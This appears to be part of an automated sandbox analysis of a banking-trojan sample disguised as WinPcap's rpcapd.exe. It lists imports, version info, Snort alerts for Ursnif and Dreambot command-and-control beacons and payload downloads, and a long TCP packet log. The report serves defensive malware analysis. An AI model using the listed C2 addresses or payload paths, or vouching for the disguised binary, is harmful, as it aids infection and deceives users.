KERNEL32.dll	lstrlenW, GetBinaryTypeW, GetModuleFileNameW, GetModuleHandleW, GetLastError, GetNLSVersion, GetSystemWindowsDirectoryA, lstrcpynA, GetCurrentThread, GetDefaultCommConfigW, ExitProcess, GetSystemDirectoryW, GetCommandLineA, FindNextVolumeMountPointW, DeleteCriticalSection, LockResource, GetCurrentDirectoryA, GetDefaultCommConfigA
Secur32.dll	InitializeSecurityContextW
ADVAPI32.dll	GetOldestEventLogRecord, FindFirstFreeAce, GetLengthSid, EnumServicesStatusW, RegOpenKeyA, GetPrivateObjectSecurity, GetSecurityDescriptorOwner
GDI32.dll	GetCurrentPositionEx, GetBrushOrgEx, GetTextExtentExPointW

Version Infos

Description	Data
LegalCopyright	Copyright 2005-2007 CACE Technologies. Copyright 2003-2005 NetGroup, Politecnico di Torino.
InternalName	rpcapd
FileVersion	4.0.0.1040
CompanyName	CACE Technologies
LegalTrademarks
ProductName	WinPcap
ProductVersion	4.0.0.1040
FileDescription	Remote Packet Capture Daemon
Build Description
OriginalFilename	rpcapd.exe
Translation	0x0000 0x04b0

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
04/22/22-16:15:22.811303 04/22/22-16:15:22.811303	TCP	2033204	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)	49750	80	192.168.2.6	146.70.35.138
04/22/22-16:17:42.488376 04/22/22-16:17:42.488376	TCP	2031743	ET TROJAN Ursnif Payload Request (cook32.rar)	49842	80	192.168.2.6	193.56.146.148
04/22/22-16:18:43.523910 04/22/22-16:18:43.523910	TCP	2823044	ETPRO TROJAN W32.Dreambot Checkin	49848	80	192.168.2.6	67.43.234.37
04/22/22-16:15:01.518080 04/22/22-16:15:01.518080	TCP	2033203	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)	49742	80	192.168.2.6	13.107.42.16
04/22/22-16:15:21.968987 04/22/22-16:15:21.968987	TCP	2033203	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)	49750	80	192.168.2.6	146.70.35.138
04/22/22-16:17:43.570159 04/22/22-16:17:43.570159	TCP	2823044	ETPRO TROJAN W32.Dreambot Checkin	49844	80	192.168.2.6	67.43.234.14
04/22/22-16:18:43.374523 04/22/22-16:18:43.374523	TCP	2823044	ETPRO TROJAN W32.Dreambot Checkin	49847	80	192.168.2.6	13.107.42.16
04/22/22-16:17:42.801276 04/22/22-16:17:42.801276	TCP	2031744	ET TROJAN Ursnif Payload Request (cook64.rar)	49842	80	192.168.2.6	193.56.146.148
04/22/22-16:15:24.287033 04/22/22-16:15:24.287033	TCP	2033203	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)	49750	80	192.168.2.6	146.70.35.138
04/22/22-16:17:54.570587 04/22/22-16:17:54.570587	TCP	2831962	ETPRO TROJAN Ursnif Variant CnC Beacon 8 M1	49846	80	192.168.2.6	67.43.234.14
04/22/22-16:17:43.262885 04/22/22-16:17:43.262885	TCP	2823044	ETPRO TROJAN W32.Dreambot Checkin	49843	80	192.168.2.6	13.107.42.16

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 22, 2022 16:15:21.941466093 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:21.965562105 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:21.965738058 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:21.968986988 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:21.992867947 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:22.344774961 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:22.344825983 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:22.344849110 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:22.344877958 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:22.344908953 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:22.344930887 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:22.344960928 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:22.344995022 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:22.345015049 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:22.345053911 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:22.345062017 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:22.345081091 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:22.345084906 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:22.345104933 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:22.345135927 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:22.345160007 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:22.345185995 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:22.345191956 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:22.345194101 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:22.346399069 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:22.384258986 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:22.384305000 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:22.384320974 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:22.384332895 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:22.384351969 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:22.384366035 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:22.384509087 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:22.384516001 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:22.384529114 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:22.384537935 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:22.384541988 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:22.384562016 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:22.384578943 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:22.384587049 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:22.384589911 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:22.384593010 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:22.384766102 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:22.384772062 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:22.384780884 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:22.384784937 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:22.384799004 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:22.384859085 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:22.384864092 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:22.384957075 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:22.384975910 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:22.384989023 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:22.385029078 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:22.385123968 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:22.385170937 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:22.424123049 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:22.424153090 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:22.424166918 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:22.424185038 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:22.424197912 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:22.424343109 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:22.424365044 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:22.424494982 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:22.424515963 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:22.424529076 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:22.424546957 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:22.424572945 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:22.424576044 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:22.424668074 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:22.424674034 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:22.424762964 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:22.424777985 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:22.424794912 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:22.424873114 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:22.424885035 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:22.448013067 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:22.452923059 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:22.463464022 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:22.463493109 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:22.463509083 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:22.463526964 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:22.463680029 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:22.463701010 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:22.463829041 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:22.463848114 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:22.463860989 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:22.463900089 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:22.463912964 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:22.463948011 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:22.463954926 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:22.464467049 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:22.464488983 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:22.464504004 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:22.464535952 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:22.464571953 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:22.464575052 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:22.464587927 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:22.464601040 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:22.464756966 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:22.464788914 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:22.464809895 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:22.464816093 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:22.464842081 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:22.465085030 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:22.476497889 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:22.479619026 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:22.503587961 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:22.503612995 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:22.503627062 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:22.503662109 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:22.503676891 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:22.503885031 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:22.504168987 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:22.504187107 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:22.504199982 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:22.504242897 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:22.504260063 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:22.504272938 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:22.504290104 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:22.504307985 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:22.504323006 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:22.504455090 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:22.504617929 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:22.504645109 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:22.504659891 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:22.504882097 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:22.504904985 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:22.504947901 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:22.504961014 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:22.505172968 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:22.505176067 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:22.505208969 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:22.505215883 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:22.505588055 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:22.505608082 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:22.505650997 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:22.527436018 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:22.528544903 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:22.543592930 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:22.543623924 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:22.543638945 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:22.543656111 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:22.543678045 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:22.543694973 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:22.543791056 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:22.544138908 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:22.544158936 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:22.544172049 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:22.544188976 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:22.544213057 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:22.544224024 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:22.544226885 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:22.544570923 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:22.544617891 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:22.544766903 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:22.544781923 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:22.544797897 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:22.544816017 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:22.544828892 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:22.544835091 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:22.544845104 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:22.544881105 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:22.544894934 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:22.544899940 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:22.544913054 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:22.544959068 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:22.544965029 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:22.552438021 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:22.554157972 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:22.583631039 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:22.583663940 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:22.583678007 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:22.583697081 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:22.583710909 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:22.583719969 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:22.583738089 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:22.583741903 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:22.583764076 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:22.583967924 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:22.583986044 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:22.584000111 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:22.584018946 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:22.584076881 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:22.584086895 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:22.584131956 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:22.584214926 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:22.584228039 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:22.584244967 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:22.584253073 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:22.584261894 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:22.584386110 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:22.584472895 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:22.584492922 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:22.584506035 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:22.584522963 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:22.584572077 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:22.584584951 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:22.607523918 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:22.611110926 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:22.623513937 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:22.623543024 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:22.623555899 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:22.623569012 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:22.623713970 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:22.623747110 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:22.623765945 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:22.623780012 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:22.623796940 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:22.623917103 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:22.623928070 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:22.624155998 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:22.624191046 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:22.624202967 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:22.624221087 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:22.624238014 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:22.624250889 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:22.624361038 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:22.624378920 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:22.624391079 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:22.624423027 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:22.624438047 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:22.624442101 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:22.624600887 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:22.624620914 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:22.624633074 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:22.624650955 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:22.624711990 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:22.624726057 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:22.624730110 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:22.634712934 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:22.638036013 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:22.663414955 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:22.663448095 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:22.663461924 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:22.663479090 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:22.663491964 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:22.663522959 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:22.663573027 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:22.663899899 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:22.663918972 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:22.663930893 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:22.663973093 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:22.663973093 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:22.664170027 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:22.664180994 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:22.664233923 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:22.664254904 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:22.664267063 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:22.664285898 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:22.664303064 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:22.664316893 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:22.664354086 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:22.664365053 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:22.664529085 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:22.664549112 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:22.664561033 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:22.664589882 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:22.664608002 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:22.664621115 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:22.664633036 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:22.664643049 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:22.664647102 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:22.664740086 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:22.664781094 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:22.664807081 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:22.687138081 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:22.688399076 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:22.703248978 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:22.703278065 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:22.703293085 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:22.703305960 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:22.703478098 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:22.703505039 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:22.703728914 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:22.703747034 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:22.703762054 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:22.703775883 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:22.703854084 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:22.703865051 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:22.704102039 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:22.704121113 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:22.704133987 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:22.704150915 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:22.704184055 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:22.704197884 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:22.704199076 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:22.704210997 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:22.704216003 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:22.704735994 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:22.704761982 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:22.704775095 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:22.704808950 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:22.704824924 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:22.704895020 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:22.704919100 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:22.704932928 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:22.704963923 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:22.704972029 CEST	49750	80	192.168.2.6	146.70.35.138
